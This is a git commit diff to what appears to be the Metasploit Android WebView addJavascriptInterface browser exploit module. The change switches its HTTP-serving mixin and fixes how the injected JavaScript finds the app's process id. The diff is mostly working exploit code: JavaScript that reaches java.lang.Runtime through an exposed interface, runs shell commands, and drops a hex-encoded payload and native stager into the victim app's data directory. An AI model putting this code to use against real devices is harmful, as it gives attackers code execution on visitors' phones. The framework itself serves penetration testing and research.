Remove BES and calculate the pid manually.

joevennix · joevennix · commit 176cc8486536 · 2014-04-02T17:21:13.000-05:00
diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -7,7 +7,7 @@
 
 class Metasploit3 < Msf::Exploit::Remote
 
-  include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::Remote::BrowserAutopwn
 
   autopwn_info({
@@ -77,15 +77,11 @@ def on_request_uri(cli, req)
       print_status("Serving javascript")
       send_response(cli, js, 'Content-type' => 'text/javascript')
     else
-      super
+      print_status("Serving exploit HTML")
+      send_response_html(cli, html)
     end
   end
 
-  def on_request_exploit(cli, req, browser)
-    print_status("Serving exploit HTML")
-    send_response_html(cli, html)
-  end
-
   def ndkstager(stagename)
     localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libndkstager.so')
     data = File.read(localfile, :mode => 'rb')
@@ -99,16 +95,20 @@ def js
         // ensure that the object contains a native interface
         try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
 
+        // get the pid
+        var pid = obj.getClass().forName('android.os.Process').getMethod('myPid', null).invoke(null, null);
+
         // get the runtime so we can exec
         var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
         var runtime = m.invoke(null, null);
         var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
         var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}";
 
         // get the process name, which will give us our data path
-        var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
+        // $PPID does not seem to work on android 4.0, so we concat pids manually
+        var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
         var ch, path = '/data/data/';
-        while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
+        while ((ch = p.getInputStream().read()) >= 0) { path += String.fromCharCode(ch); }
         var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
         var stagePath = path + '/#{stagename}.apk';
         var dexPath = path + '/#{stagename}.dex';
